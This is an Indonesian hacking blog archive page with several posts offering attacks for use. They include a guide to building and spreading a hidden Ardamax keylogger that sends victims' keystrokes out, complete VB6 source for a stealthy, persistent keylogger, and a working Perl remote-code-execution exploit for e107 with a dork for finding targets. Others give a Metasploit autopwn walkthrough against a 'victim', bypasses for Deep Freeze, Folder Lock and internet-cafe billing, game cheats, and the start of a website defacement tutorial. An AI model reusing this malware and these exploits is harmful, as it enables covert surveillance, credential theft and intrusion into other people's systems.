photo mummymasterAnim_zps7bdcaa20.gif

Archive for 14 Jan 2011

Berbagai Cara Melumpuhkan Deepfreeze

By : fauzan
Deep Freeze memang aplikasi “aneh bin ajaib”. Aplikasi ini bisa “membekukan” harddisk sehingga perubahan-perubahan yang terjadi pada system akan lenyap saat komputer di restart. Namun, saat kita mencoba mengUninstallnya, seringkali kita mengalami kesulitan. Belum lagi kalau kita lupa passwordnya.
Di bawah ini akan saya coba ulas berbagai tips untuk menghabisi Deep Freeze yang saya kumpulkan dari beberapa sumber. Semoga bisa membantu anda.

============Pake xDeepFreeze=============
1. Download xDeepFreeze di sini.
2. ekstrak ke C:\xDeepFreeze
3. Jalankan file Run_Me.exe. Muncul file “mcr.bat” dan “XDeepFreeze.exe” akan terload.
4. Pada XDeepFreeze, Tekan “Stop DeepFreeze”, untuk menghentikan “frzstate.exe”
5. Bersihkan registry yang dibuat Deep Freeze saat instalasi, tekan “Clean Registry”.
6. Jalankan command.com di folder C:\xDeepFreeze
7. Jalankan mcr.bat. Ini akan membersihkan file “persifrz.vxd”.
8. Klik Exit. Deep Freeze tinggal sejarah.
============Pake Deep Unfreezer (Deep Freeze dibawah v.6)=============
1. Download Deep Unfreezer di sini.
2. Jalankan aplikasi. Klik Load Status.
3. Pilih Boot Thawed. Klik Save Status.
4. Reboot
============Pake PE Builder (Live CD Windows)=============
Cara yang satu ini saya kutip dari Wikianswer. Aplikasi yag harus disiapkan adalah PE Builder. Anda bisa mendapatkannya di sini. Selain itu, anda membutuhkan file instalasi Windows (XP Home/ Pro dengan minimal SP 1 atau Server 2003).
Langkah-langkah yang harus dilakukan cukup panjang. Pertama-tama, kita harus membuat CD Startup Windows.
1. Pastikan sistem memiliki ruang kosong 500 MB.
2. Copy file instalasi Windows ke folder khusus di Harddisk.
3. Install PE Builder, lalu jalankan aplikasi ini.
4. Setelah menyetujui License Agreement, akan muncul tampilan utama PE Builder.
5. Masukkan lokasi file instalasi Windows.
6.Pada dialog PE Builder, pilih opsi “Burn CD/DVD”. Ketika anda menggunakan CD RW (bisa dihapus), pastikan bahwa pilihan “AutoErase RW” diaktifkan. Pilihan “burn using” harus diset ke “StarBurn”. Kalau anda ingin CD otomatis dikeluarkan setelah proses burning selesai, centangi “Eject after burn”. Pilih cd writer anda dari daftar device.
7. klik “build”. PE builder akan meminta ijin membuat direktori BartPE, jawab Yes.
8. Lisensi dari Microsoft Windows tampil. Baca dan pilih agree untuk melanjutkan.
9. Tunggu sampai selesai.
Langkah selajutnya, silakan retart komputer dan masuk ke BIOS. Ubah urutan booting agar boot melalui CD. Setelah masuk ke live CD Windows, lakukan langkah-berikut.
1. Jalankan regedit.
2. Buka menu Find dan masukkan “UpperFilters”. Jangan lupa centangi “only the Values”.
3. Jika telah ditemukan, lihat apakah terdapat baris yang mencantumkan driver Deep Freeze (DeepFrz atau DepFrzLo) lalu hapus. hapis juga baris untuk ThawSpace (ThwSpace), biarkan sisanya. Tekan F3 untuk melanjutkan pencarian dan ulangi proses diatas sampai value UpperFilters tidak ada di key HKLM\MySystem.
4. Tuju ke HKLM\MySystem\Select lalu buka value bernama Default. Di sini terdapat key untuk control set yang akan digunakan system saat booting. Jika nilainya 1 maka akan tertulis ControlSet001, jika 2 akan tertulis ControlSet002, dst. Ingat control set itu
5. Lalu tuju ke HKLM\MySystem\ControlSetXXX(sesuai default)\Services lalu hapis key yang bernama driver Deep Freeze (DeepFrz atau DepFrzLo dan DepFrzHi). Lalu hapus juga driver ThawSpace (ThwSpace).
6. Reboot system secara normal.
7. Selesai sudah.
Bila ada langkah-langkah yang kurang jelas, silakan periksa referensi.

Hack Menggunakan Keylogger

By : fauzan
Artikel ini tidak bermaksud untuk memberitahukan kepada kalian bagaimana cara melakukan tindakan hacking atau menganjurkan kalian untuk melakukan tindakan hacking, hanya untuk berbagi pengalaman dan sharing.

Pertama yang harus kalian lakukan adalah mendapatkan software yang bernama keylogger merupakan tool yang merekam semua aktifitas pada keyboard target komputer.

Download softwarenya di sini.

Kedua adalah melakukan setup pada software tersebut untuk mendapatkan log file yang akan dikirim kepada email yang tersetup pada pilih option pada software ini.

Keterangan Langkah² Menjalankan Keylogger :

1. Email penerima log attachment -> Ini di isi dengan email anda / email penerima hasil dari logging, misal: emailsaya@gmail.com

2. SMTP Server -> Ini diisi dengan SMTP Server yang anda punya, misal: smtp.serversaya.net.id / smtp.indo.net.id

3. Username SMPT server -> Ini diisi dengan username SMTP yang anda dapat dari username SMTP Server, misal: smtpsaya@serversaya.net.id / smtpsaya@indo.net.id

4. Password SMPT server -> Password SMTP, di isi dengan password SMTP Anda :)

Ketiga lakukan remote installation dengan mengcompile file .exe bisa software apa saja.

Untuk melakukan compile remote installation sangat mudah kita dipandu dengan menu Wizard seperti pada gambar diatas.
Terakhir adalah menyebarkan file .exe tersebut kepada komputer target terserah untuk menyebarkannya lakukan dengan cara kalian bagamana agar target mau melakukan install software yang sudah kalian compile. Ini cara hack yang bener benar terbukti.

Sekali terinstal maka semua aktifitas komputer target akan terekam dan tidak terdeteksi oleh Anti virus. Software ini tidak gue complie jadi masih fresh.

Artikel Posted By Yohan – Approved By BinusHacker Team

Artikel Ini Diupdate Oleh BinusHacker Team – Tambahan Cara Instlall Ardamax Keylogger Buat Kalian (^_^)

1. Setelah menginstal program, ketika menjalankan untuk pertama kalinya akan diminta untuk memasukkan nama dan nomor serial key yang udah include didalam folder ketika di download. Silakan dilihat didalamnya.


2. Setelah mengaktifkannya, langsung dibuka aja. Ketika Anda akan membukanya, Anda akan melihat icon ditambahkan ke dalam sistem tray. Langsung klik ajah.
3511692621 cbd1d6bed1 Tutorial On Ardamax 3.0 Keyloggers
3. Sekarang mari kita klik kanan pada ikon & lalu klik “Remote Installation”.

4. Klik Next. Pada option “Additional components” pilih “Log viewer”.
5. Next lanjut kepada “Invisibility” options. Centangin ajah semuanyabiar mantep Invisibilitynya.
6. Next option “Security”, gak perlu sih, langsung NEXT lagi ajah.
7. Next option “Web Update”, Jangan dicentangin semuanya / terserah sih maunya gimana, yg penting baca dulu perintah & maksudnya, kemudian klik NEXT.
8. Kemudian akan muncul “Options” page. Pilih seperti contoh dibawah ini.

9. Cara dibawah ini harus dipastikan berjalan, klo gak jalan keyloggernya gak akan berhasil. Wajib diperhatikan!!

Pilihlah sesuai dengan keinginan anda. Diharapkan anda menyeting dengan benar :)

10. Isilah username & password FTP Account yang anda miliki. Seperti penjelasan sebelumnya di tahap awal cara setting FTP.
11. Klik test, untuk melakukan test koneksi, apabila berhasil. Maka dipastikan keylogger anda berjalan dengan baik.
12. Next ke “control” page, aturnya sesuai keinginan dah. Klo gak tau ya lewatin ajah.
13. Next ke “Screen shot”, Klik Next ajah klo sudah tau artinya itu mah.
14. Silakan pilih file untuk generate keylogger file.
15. Selesai!
16. Silakan gunakan dengan baik :)
Catatan: Deactivate sementara anti virus anda, kadang ini terdeteksi sebagai admx virus / keylogger. Enjoy & Eat It!

Buka Kode Keamanan Segala Jenis HP

By : fauzan
Pusing ketika kita lupa password kode keamanan HP kita? Bingung mau nyari nyari kemana gak ketemu. Trus kita pergi ke counter dengan membayar kurang lebih “Rp.50.000 – Rp.200.000″? Apalagi buat anak kost, wih gile banyak abis duit segitu, apalagi buat anak sekolah sama kuliahan. Ampon dah.. Uang jajan bisa abis buat benerin HP gara² lupa security doank! Nah, ni gw kasi toolsnya. Tinggal download dan gunain deh. Gampang kok, gak bakal nyampe 50.000 degh. Kcuali lw sambil maen game sampe 10 Jam di warnet buat download sambil nge-game. Wkwkw.. Yok dah kite mulai..


Nah, tools ini adalah sebuah aplikasi untuk Unlocking Nokia, Siemens, Vitel, Maxel, Panasonic, LG, AEG, Samsung, dan Motorola. Nih penjelasan detailnya”


Untuk download aplikasinya anda bisa download di sini.

jika sudah di download, tinggal install aja aplikasinya,,,,
WorldUnlock Kalkulator adalah sebuah aplikasi gratis untuk Nokia, Siemens, Vitel, Maxel, Panasonic, LG, AEG, Samsung, dan Motorola untuk membuka kode keamanan dan security lainnya.

Include MasterCode kalkulator yang dapat me-reset kode pengaman handphone.

Panduan:
1. Pilih model telepon dari daftar.
2. Masukkan nomor IMEI telepon Anda (Tekan * # 06 # pada telepon)
3· Pilih negara dan penyedia layanan di mana ponsel dibeli.
4· Tekan tombol: Calculate!
5· Nah selanjutnya muncul beberapa unlock codes.
6. 7 kode akan ditampilkan, gunakan kode pertama dimulai dari +7.
7· Jika belum bekerja, coba +1 dan yang terakhir +5.
8· Bila telepon menampilkan “Sim restriction off” itu berarti sudah tidak terkunci.
9· Jika hanya dua kode yang ditampilkan (+1 dan +2) masukkan code tersebut bersamaan!


Kode akan ditampilkan pada form: # pw + CODE + n #
Untuk memperoleh huruf: p, w atau +, tekan tombol * beberapa kali.

Masukkan kode dengan benar dengan menghapus semua simcard dari telepon, kemudian hidupkan telepon kembali dan kemudian masukkan kode.

Fitur “WorldUnlock Codes Calculator” adalah:

· Unlock Nokia
· Unlock LG
· Unlock Panasonic
· Unlock Maxon
· Unlock Samsung
· Unlock AEG/Telital
· Unlock Alcatel
· Unlock Siemens
· Unlock Sony
· Unlock Vitel

NOTE: XP/Vista/7 Is OK :D

keyloger=keyloging

By : fauzan
berikut ini source code KeyLogger yang bisa kamu compile pake VB 6.0. Kita hanya butuh sebuah timer dan module.

Yang perlu diperhatikan :

1. setelah REGSVC32.exe dieksekusi, keylogger tsg akan lg menulis di registry agar program tsb dieksekusi pd waktu booting:

(hkey_local_machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run).

2. Aktifitas keylogger ini tidak dapat dilihat melalui task manager (Ctrl+Alt+Del)

3. kamu tidak dapat menghapus file REGSVC32.exe (this file is being used by windows)

4. kamu tidak dapat menghentikan booting REGSVC32.exe melalui regedit ato msconfig

5. Untuk melihat hasil rekaman KeyLogger ini kamu bisa buka file REGSVC32.DLL dengan Notepad

6. selama Keylogger ini aktif kamu tidak bisa melakukan Logoff user … :(

======= code mulai ==========================

‘simpan file hasil compile dg nama regsvc32.exe

‘form

‘simpan dg nama FRMLOG.frm

Option Explicit

Private Declare Sub Sleep Lib “kernel32″ (ByVal dwMilliseconds As Long)

Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer

Private Declare Function RegCreateKey Lib “advapi32.dll” Alias “RegCreateKeyA” (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Private Declare Function RegSetValueEx Lib “advapi32.dll” Alias “RegSetValueExA” (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long

Private Declare Function RegisterServiceProcess Lib “kernel32″ (ByVal ProcessID As Long, ByVal ServiceFlags As Long) As Long

Private Declare Function GetCurrentProcessId Lib “kernel32″ () As Long

Private sAppName As String

Private Const REG_SZ = 1

Private Const LOCALMACHINE = &H80000002

Private Const RSP_SIMPLE_SERVICE = 1

Private Const RSP_UNREGISTER_SERVICE = 0

Private Const VK_BACK = &H8

Private Const VK_CONTROL = &H11

Private Const VK_SHIFT = &H10

Private Const VK_TAB = &H9

Private Const VK_RETURN = &HD

Private Const VK_MENU = &H12

Private Const VK_ESCAPE = &H1B

Private Const VK_CAPITAL = &H14

Private Const VK_SPACE = &H20

Private Const VK_SNAPSHOT = &H2C

Private Const VK_UP = &H26

Private Const VK_DOWN = &H28

Private Const VK_LEFT = &H25

Private Const VK_RIGHT = &H27

Private Const VK_MBUTTON = &H4

Private Const VK_RBUTTON = &H2

Private Const VK_LBUTTON = &H1

Private Const VK_PERIOD = &HBE

Private Const VK_COMMA = &HBC

Private Const VK_NUMLOCK = &H90

Private Const VK_NUMPAD0 = &H60

Private Const VK_NUMPAD1 = &H61

Private Const VK_NUMPAD2 = &H62

Private Const VK_NUMPAD3 = &H63

Private Const VK_NUMPAD4 = &H64

Private Const VK_NUMPAD5 = &H65

Private Const VK_NUMPAD6 = &H66

Private Const VK_NUMPAD7 = &H67

Private Const VK_NUMPAD8 = &H68

Private Const VK_NUMPAD9 = &H69

Private Const VK_F9 = &H78

Private Const VK_F8 = &H77

Private Const VK_F7 = &H76

Private Const VK_F6 = &H75

Private Const VK_F5 = &H74

Private Const VK_F4 = &H73

Private Const VK_F3 = &H72

Private Const VK_F2 = &H71

Private Const VK_F12 = &H7B

Private Const VK_F11 = &H7A

Private Const VK_F10 = &H79

Private Const VK_F1 = &H70

Private Sub LoadTextFile()

On Error GoTo dlgerror

If Len(App.Path) <= 3 Then

Open App.Path & “settings.ini” For Input As #1

Line Input #1, sAppName

Close

Else

Open App.Path & “\settings.ini” For Input As #1

Line Input #1, sAppName

Close

End If

If sAppName = vbNullString Then

sAppName = “regsvc32″

End If

Exit Sub

dlgerror:

sAppName = “regsvc32″

End Sub

Private Sub SAVEDLL()

Dim nSaveLocation As String

On Error GoTo dlgerror

If Len(App.Path) <= 3 Then

Open App.Path & sAppName & “.dll” For Append As #1

nSaveLocation = App.Path & sAppName & “.dll”

GoTo READY

Else

Open App.Path & “\” & sAppName & “.dll” For Append As #1

nSaveLocation = App.Path & “\” & sAppName & “.dll”

GoTo READY

End If

READY:

If txtLOGGED.Text = vbNullString Then

Exit Sub

End If

Print #1, Time & ” ” & Date & vbCrLf & “Size: ” & Format(FileLen(nSaveLocation) / 1000000, “.0″) & ” MB” & vbCrLf & “*** PROGRAMS OPENED ***” & vbCrLf & vbCrLf & txtENUMERATE.Text & vbCrLf & vbCrLf & txtLOGGED.Text & vbCrLf & vbCrLf

Close

Close

Close

SetAttr nSaveLocation, vbHidden

Exit Sub

dlgerror:

Err.Clear

Exit Sub

End Sub

Private Sub Form_Load()

On Error Resume Next

Call LoadTextFile

Me.Caption = sAppName

Me.Visible = False

App.TaskVisible = False

App.Title = sAppName

ENTERREGISTRY

RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE

End Sub

Private Sub ENTERREGISTRY()

Dim nKey As Long

RegCreateKey LOCALMACHINE, “SOFTWARE\Microsoft\Windows\CurrentVersion\Run”, nKey

If Len(App.Path) <= 3 Then

RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & App.EXEName & “.exe”, Len(App.Path & App.EXEName & “.exe”)

Else

RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & “\” & App.EXEName & “.exe”, Len(App.Path & “\” & App.EXEName & “.exe”)

End If

End Sub

Private Sub Form_Unload(Cancel As Integer)

Cancel = True

Call SAVEDLL

ENTERREGISTRY

Unload Me

End

End Sub

Private Sub tmrCAPTION_Timer()

On Error Resume Next

Me.Caption = sAppName

Me.Visible = False

App.TaskVisible = False

App.Title = False

RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE

End Sub

Private Sub tmrLOG_Timer()

On Error Resume Next

Dim nKey, nChar As Integer

Dim nText As String

For nChar = 1 To 255

nKey = GetAsyncKeyState(nChar)

If nKey = -32767 Then

nText = Chr(nChar)

If nChar = VK_BACK Then

nText = ” {B.S} ”

ElseIf nChar = VK_CONTROL Then

nText = ” {CTRL} ”

ElseIf nChar = VK_SHIFT Then

nText = ” {SHIFT} ”

ElseIf nChar = VK_TAB Then

nText = ” {TAB} ”

ElseIf nChar = VK_RETURN Then

nText = ” {ENTER} ”

ElseIf nChar = VK_MENU Then

nText = ” {ALT} ”

ElseIf nChar = VK_ESCAPE Then

nText = ” {ESC} ”

ElseIf nChar = VK_CAPITAL Then

nText = ” {CAPS} ”

ElseIf nChar = VK_SPACE Then

nText = ” {SP.B} ”

ElseIf nChar = VK_UP Then

nText = ” {UP} ”

ElseIf nChar = VK_LEFT Then

nText = ” {LEFT} ”

ElseIf nChar = VK_RIGHT Then

nText = ” {RIGHT} ”

ElseIf nChar = VK_DOWN Then

nText = ” {DOWN} ”

ElseIf nChar = VK_F1 Then

nText = ” {F1} ”

ElseIf nChar = VK_F2 Then

nText = ” {F2} ”

ElseIf nChar = VK_F3 Then

nText = ” {F3} ”

ElseIf nChar = VK_F4 Then

nText = ” {F4} ”

ElseIf nChar = VK_F5 Then

nText = ” {F5} ”

ElseIf nChar = VK_F6 Then

nText = ” {F6} ”

ElseIf nChar = VK_F7 Then

nText = ” {F7} ”

ElseIf nChar = VK_F8 Then

nText = ” {F8} ”

ElseIf nChar = VK_F9 Then

nText = “{F9}”

ElseIf nChar = VK_F10 Then

nText = ” {F10} ”

ElseIf nChar = VK_F11 Then

nText = ” {F11} ”

ElseIf nChar = VK_F12 Then

nText = ” {F12} ”

ElseIf nChar = VK_SNAPSHOT Then

nText = ” {PRINT SCRN} ”

ElseIf nChar = VK_RBUTTON Then

nText = ” {R.B} ”

ElseIf nChar = VK_LBUTTON Then

nText = ” {L.B} ”

ElseIf nChar = VK_MBUTTON Then

nText = ” {M.B} ”

ElseIf nChar = VK_PERIOD Then

nText = “.”

ElseIf nChar = VK_COMMA Then

nText = “,”

ElseIf nChar = VK_NUMLOCK Then

nText = ” {NUMLCK} ”

ElseIf nChar = VK_NUMPAD0 Then

nText = “0″

ElseIf nChar = VK_NUMPAD1 Then

nText = “1″

ElseIf nChar = VK_NUMPAD2 Then

nText = “2″

ElseIf nChar = VK_NUMPAD3 Then

nText = “3″

ElseIf nChar = VK_NUMPAD4 Then

nText = “4″

ElseIf nChar = VK_NUMPAD5 Then

nText = “5″

ElseIf nChar = VK_NUMPAD6 Then

nText = “6″

ElseIf nChar = VK_NUMPAD7 Then

nText = “7″

ElseIf nChar = VK_NUMPAD8 Then

nText = “8″

ElseIf nChar = VK_NUMPAD9 Then

nText = “9″

End If

txtLOGGED.Text = txtLOGGED.Text + nText

End If

Next

Call GetActiveWindowName

End Sub

Private Sub tmrSAVE_Timer()

Call SAVEDLL

txtLOGGED.Text = vbNullString

txtENUMERATE.Text = vbNullString

End Sub
====code end ===========

============code mulai ============

‘module visual basic

‘simpan dg nama mdlActiveWindow.bas

Option Explicit

Public Declare Function GetWindowText Lib “user32″ Alias “GetWindowTextA” (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long

Public Declare Function GetForegroundWindow Lib “user32″ () As Long

Public Declare Function GetClassName Lib “user32″ Alias “GetClassNameA” (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long

Public nCAPTION As String

Public nTESTER As Long

Public nClass As String

Public Sub GetActiveWindowName()

nCAPTION = Space(256)

nClass = Space(256)

GetWindowText GetForegroundWindow, nCAPTION, Len(nCAPTION)

GetClassName GetForegroundWindow, nClass, Len(nClass)

If nTESTER = GetForegroundWindow Then Exit Sub

FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbCrLf & Time & ” ” & nCAPTION

FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbTab & nClass

nTESTER = GetForegroundWindow

End Sub

============= code end =============

/* ——————————|EOF|—————————— */

sumber : spyrozone.net
###############################################################

Cracking With Metasploit

By : fauzan
First download Metasploit 3.3 From Legal Site, Link:http://www.metasploit.com/
Silahkan anda install, dan menjelang akhir install akan menanyakan apakah Anda ingin install nmap juga? pilih Yes
setelah anda menginstal akan ada tampilan sebagai di bawah ini

kemudan ketik “db_create” tanpa menggunakan tanda petik Sekali lagi anda mengetik type nmap. Load nmap seperti gambar berikut ini:

Anda perlu mengkonfigurasi scan sekarang
Biasanya saya lakukan sederhana-sT-sV scan yang akan kami kirim port yang terbuka dan layanan yang berjalan pada komputer korban, Sekarang ketik nmap-sT-sV xxx.xxx.xxx.x (X menjadi korban nomor Ip), seperti di bawah ini.
Sekarang berikan 5 menit untuk menyelesaikan scan, Setelah lengkap jika Anda beruntung, Anda harus mendapatkan respon seperti ini …
Pada dasarnya ini adalah daftar port yang terbuka dan layanan yang berjalan pada mesin target, Sekarang fitur berguna dari 3,3 metasploit kerangka adalah fitur autopwn, pada dasarnya ini pencarian dan menjalankan semua sesuai eksploitasi dalam database Metasploit terhadap mesin target dan jika berhasil akan menciptakan sebuah shell atau hak serupa bagi attacker
Sekarang setelah Anda memiliki hasil nmap dikirim kembali kepada Anda menunjukkan port yang terbuka dan jenis layanan db_autopwn-p-t-e, Dari titik ini, Anda juga akan memiliki akses ke komputer korban melalui diluncurkan dengan sukses mengeksploitasi atau Anda akan mendapat jawaban mesin tidak rentan atas eksploitasi di Metasploit database. Sayangnya pada mesin khusus ini saya menemukan itu tidak rentan seperti gambar di bawah ini.

Good Luck

e107 Remote Code Execution + Scanner

By : fauzan
Hallo Semua, Kembali Lagi Dengan Mencari Target Shell. Banyak Yang Minta Target Di Channel, Tapi So Far It’s OK lah :)

Yuk nyari target dengan e107 bug dork. Jangan lupa install perl di komputer anda / server anda / shell anda (PENTING). Berikut ini adalah Exploitnya, copy dan simpan di file bernama: “e107-binushacker.pl# Exploit Title: e107 Code Exec




# Date: 05/22/10

# Author: McFly@e107.org

# Software Link: http://e107.org/edownload.php

# Version: e107 <= 0.7.20

# Tested on: Linux/Windows



#!/usr/bin/perl -w

#################################################

# e107 Code Exec // SploitAuthor: McFly@e107.org

#################################################

# These scrubs still haven't released an update!

# Here is a little bit of motivation for them to

# patch one of the most popular, and insecure of

# the PHP web apps available today.

#################################################

# DORK: inurl:e107_plugins

#################################################



use LWP::UserAgent;



my $path = $ARGV[0] or die("Gunakan Perintah: perl e107-binushacker.pl http://e107site/pathto/contact.php\n");

my $load = 'passthru(chr(105).chr(100))'; # Simple 'id' command. Put ur PHP payload here!



# Remove comment for proxy support

my $proxy = 'http://127.0.0.1:8118/';

$ENV{http_proxy} = $proxy ? $proxy: 0;



$ua = new LWP::UserAgent;

$ua->agent("Mozilla/5.0");



if ( $proxy )

{

print "[*] Using proxy $proxy \n";

$ua->env_proxy('1');

}



my $req = new HTTP::Request POST => $path;

$req->content_type('application/x-www-form-urlencoded');

$req->content("send-contactus=1&author_name=%5Bphp%5D$load%3Bdie%28%29%3B%5B%2Fphp%5D");



my $res = $ua->request($req);

my $data = $res->as_string;



if ( $data =~ /<td class=["']main_section['"]>(.*)/ )

{

$data = $1;

print "$data\n";

}

else

{

print "$data\n";

}
Setelah code tersebut dibuat, maka jalankan di directory active run perl shell / command prompt anda dengan dengan perintah: perl e107-binushacker.pl http://www.targetanda.com/pathnya/contact.php
Adapun Cara Lain Manual Bisa Dilihat (Video) Berikut:
Lihat Videonya Disini: HERE
Download it: HERE

Crack Folder Lock

By : fauzan
Kali ini saya posting tentang menjebol folder lock
langsung aja dech
To the POint:
1. Buka folder yg udah di proteksi ama Folder Lock dan coba masukin sembarang password
2. Biarin Folder Lock menunggu, buka regedit “hkey_local _machinesoftwarefolder lock, “bar code”
3. Ganti nama “bar code” menjadi “bar codet”
4. Sekarang kembali ke Folder Lock dan masukin password terserah apa aja
5. Lalu Klik “ok” dan mudah mudahan Folder Lock sudah bisa di Akses.
Semoga Bermanfaat, setidaknya sebagai bahan pengingat ilmu2 kita yg udah hilang….
Bravo Indonesian.

Cracking Caesarsoft Billing

By : fauzan
tips n trik cara membobol billing warnet khususnya CAESARSOFT*
Sebenernya caranya cukup simple. kita log in id n pass username menggunakan administrator. tapi perlu digaris bawah klo cara ini “masih” ada kemungkinan ketauan. klo OPnya teliti cz waktu kita uda log in pake pass admin. di billing client ga kelacak alias ga ada user yg maket itu komp…jadi waspadalah !! ^^
Okelah tanpa panjang pendek. gini caranya :
1. Pastiin kita telah masuk login screennya Cyber Billing
2. Tekan key : Windows + U, trus kita masuk Utility Manager
3. Pilih menu Help
4.Klo sdh masuk help pagenya, Klik kanan di windows bar
5. Pilih Jump to URL..
6. Ketik ke C: buat masuk ke systemnya… trus modif aja sesuai keinginan (bisa jg lgsg masuk buat internetan gratis. Tapi cm pake IE aja..)
Selamat berkreasi. artikel ini saya tulis hanya untuk berbagi ilmu aja. Dari rasa penasaran yg akhirnya jadi ugal-ugalan… Tapi sesuai pepatah “ga ada yang aman didunia ini”….
Terima kasih n salam hangat ^^

Crack Billing Ecafepro Client

By : fauzan
Numpang posting ya cuma memberikan imformasi aja niuh
Hack biling ecafe pro untuk di client aja jadi waktunya bisa berhenti tanpa comnya mati
Nih contoh gambarnya:
Gambar ke 1:
lihat di sini http://img204.imageshack.us/i/1111bbf.jpg/
Gambar ke 2
lihat di sini http://img257.imageshack.us/i/88761046.jpg/
Download aja di sini ya:
http://www.ziddu.com/download/12734107/ecafeprocacad.rar.html

Archive Point Blank Cheat

By : fauzan
Tutorial:
instal vcredits_x86
buka injector
buka PBloncer
kalo injectornya udah gerak ke pojok atas klik hack masmed
trus alt+tab klik nya jngan asal-asalan…
kalo udah kluar notice klik resume…
Untuk beli misi mayor point harus cukup 14000 baru bisa beli misi mayor..

Cheat/Trainer Effect :


[*] MINIMIZE = INSERT [ON]
[*] MINIMIZE = DELETE [OFF]
[*] MAJOR MISSION HACK = END
[*] RESET TITLE = F12
[*] TITLE HACK = HOME
[*] MASMED HACK = NUMPAD 1 – 0
[*] COMPLETE ALL CARD = PAGEUP
[*] UNCOMPLETE ALL CARD = PAGEDOWN
[*] QUICK EXIT PROCESS = PAUSE BREAK
[*] WALLSHOT = F5 [ON]
[*] WALLSHOT = F7 [OFF]
[*] RPG Mode = F9
[*] Allow all weapons = F10
Credit:
Injector: Bayi Kuntilanak
dll: RCD@N3
Cheat/Trainer Effect :
[*] MINIMIZE ON = F9
[*] MINIMIZE OF = F10
[*] HACK TITLE (With title Effect) = F11
[*] HACK MISI MAYOR = F12
[*] MASMED = NUMPAD 1-0
[*] COMPLETE CARD = F3
[*] RESET CARD = F2
[*] SPION MODE = F7
[*] NoName Mode = F4
[*] Included With Rinocomp Packet Editor
Credit: Rino_Com@N3


Loki025 21-11-2010 |Download|
[*] MINIMIZE ON = F1
[*] MINIMIZE OF = F2
[*] HACK TITLE = F11
[*] HACK MISI MAYOR = F12
[*] MASMED = NUMPAD 1-0
[*] COMPLETE CARD = INSERT
[*] RESET CARD = DELETE
[*] RESET HACK TITTLE = F10
[*] SPION MODE = HOME
BoTeMz & Dodii-N3 FIX SatNight 10.15.exe |Download|
[*] MisiMayor [F12]
[*] Title Hack [F11]
[*] Card Hack [NUM 0 Sampai 9]
[*] Restart Card [NUM -]
[*] Spion Mode Hack [= F10]
[*] AltTab On [= F1]
[*] AltTab Off [= F2]
DOUBEL MISI MAYOR BY AKIRA CHAN Nstars.net |Download|
FITUR ada di dlam rar..
BlackBerry V.1 |Download|
[*] MINIMIZE : F1 [ON]
[*] MINIMIZE : F2 [OFF]
[*] HACK TITLE : F11
[*] HACK MISI MAYOR = F12
[*] MASMED : NUMPAD 1-0
[*] RESET CARD : DELETE
[*] RESET TITTLE : F10
X-LonZ_Repack 20112010 |Donwload|

Paasword→X-LONZ
[*] MINIMIZE = F1 [ON]
[*] MINIMIZE = F2 [OFF]
[*] Spion Mode = F10
[*] HACK TITLE = F11
[*] HACK MISI MAYOR = F12
[*] MASMED = NUMPAD 1-0
[*] RESET CARD = DELETE

[PB] zenix 20/11/2010
|Download|
[*] MINIMIZE            = F9  [ON]
[*] MINIMIZE            = F10 [OFF]
[*] UNLIMITED DUAL      = F11 [ON]
[*] UNLIMITED DUAL      = F12 [OFF]
[*] NO RECOIL           = F7  [ON]
[*] NO RECOIL           = F8  [OFF]
[*] HACK TITLE         = INSERT
[*] HACK MISSION       = F1
[*] MASMED             = NUMPAD 0-9
[*] MISSION CLEAR      = HOME
[*] RESET CARD         = END
[*] FREE VIEW MODE     = DELETE
[*] AUTO CHANGE NAME

Source: http://bayikuntilanak.blogspot.com/ 

Deface Website – Via URL – Windows Version

By : fauzan
Pada posting ini kita coba membahas “deface website” apa itu ?? Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya ilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo sob adalah web master dan sob ngerubah tampilan halaman situs yang sob punya tentu saja itu nggak bisa disebut deface…heheheh. Banyak yang bertanya “gimana sich nge-deface situs?” proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kalian ketahui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbeda apabila kita ingin melakukan deface diantara kedua OS tsb. Operating System atau OS biasanya kalo kita kelompikin ke 2 keluarga besar,yaitu :


1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)
elalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui…Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan “unicode bug”. Sayah tidak akan menjelaskan panjang lebar mengenai “unicode bug” ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! gn bilang sapa2 yah sebenernyah sayah teh emang gak tau …ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.
OK…mari kita mulai…Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)…key nya terserah
kowe…..Lalu utk mengetahui site itu menggunakan MS IIS 4.0/5.0…Kita scan terlebih dahulu di www.netcraft.com……dapat site yah..??…Okeh..setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 …Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc….coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg
